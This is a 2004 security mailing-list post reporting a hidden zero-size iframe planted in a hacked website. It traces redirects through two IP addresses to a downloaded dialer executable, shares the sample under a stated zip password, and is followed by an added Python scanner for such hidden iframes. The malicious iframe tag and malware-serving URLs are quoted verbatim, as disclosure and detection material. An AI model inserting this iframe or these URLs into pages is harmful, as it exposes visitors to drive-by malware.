Full Disclosure mailing list archives
Possible dialer on 62.4.84.150
From: "Daniel Bartlett" <danbuk_fd () warpmail net>
Date: Tue, 17 Aug 2004 19:47:03 +0100
Hi All,

I've only looked at this for about 3 mins, so there isn't a lot to tell.

From a website that looks like someone has hacked it and added an IFRAME to the top of the page:

<iframe FRAMEBORDER="0" width="0" height="0" src="http://213.158.119.103/iframe.php?xid=111"></iframe>

From this frame it gets bounced onto:
http://62.4.84.150/data/start.php?id=111-b&aid=0
then onto:
http://62.4.84.150/data/start.php?id=111-download&aid=0
which then downloads a 17984b exe file.

I've attached a strings output from the exe, and a copy of the exe (password for zip is lamedial).

I hope someone else can shed more light on this than I can.

Cheers,
Daniel B.

--
Daniel Bartlett
danbuk_fd () warpmail net
Attachment: lamedial.zip
Attachment: lamedial-strings.txt
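The hidden-frame pattern reported above, as a check a site owner could run over their own served pages. This is an added example, not part of the original post: the function and class names, the page host www.example.org and all sample markup other than the quoted iframe tag are constructed, and the display:none case goes beyond the zero-size tag in the post.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ZERO = re.compile(r"^\s*0+(\.0+)?\s*(px|%)?\s*$", re.I)
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


class IframeAudit(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # invisible iframes that load from another host

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: v or "" for k, v in attrs}  # HTMLParser lowercases attribute names
        hidden = bool(ZERO.match(a.get("width", "")) or ZERO.match(a.get("height", ""))
                      or HIDDEN_CSS.search(a.get("style", "")))
        try:
            host = (urlparse(a.get("src", "")).hostname or "").lower()
        except ValueError:  # malformed src, e.g. an unclosed IPv6 bracket
            host = ""
        if hidden and host and host != self.page_host:
            self.findings.append({"line": self.getpos()[0], "src": a["src"],
                                  "ip_literal": is_ip_literal(host)})


def find_hidden_iframes(html, page_host):
    audit = IframeAudit(page_host)
    audit.feed(html)
    audit.close()
    return audit.findings


# Constructed sample page; only the first iframe is the tag quoted in the post.
SAMPLE = """<iframe FRAMEBORDER="0" width="0" height="0" src="http://213.158.119.103/iframe.php?xid=111"></iframe>
<iframe width="560" height="315" src="http://media.example.org/player"></iframe>
<iframe width="0" height="0" src="/local/tracker.html"></iframe>
<iframe style="display:none" src="http://cdn.example.net/x"></iframe>"""
```

Calling find_hidden_iframes(SAMPLE, "www.example.org") reports the frames on lines 1 and 4; the visible off-site player and the hidden same-site frame are not reported.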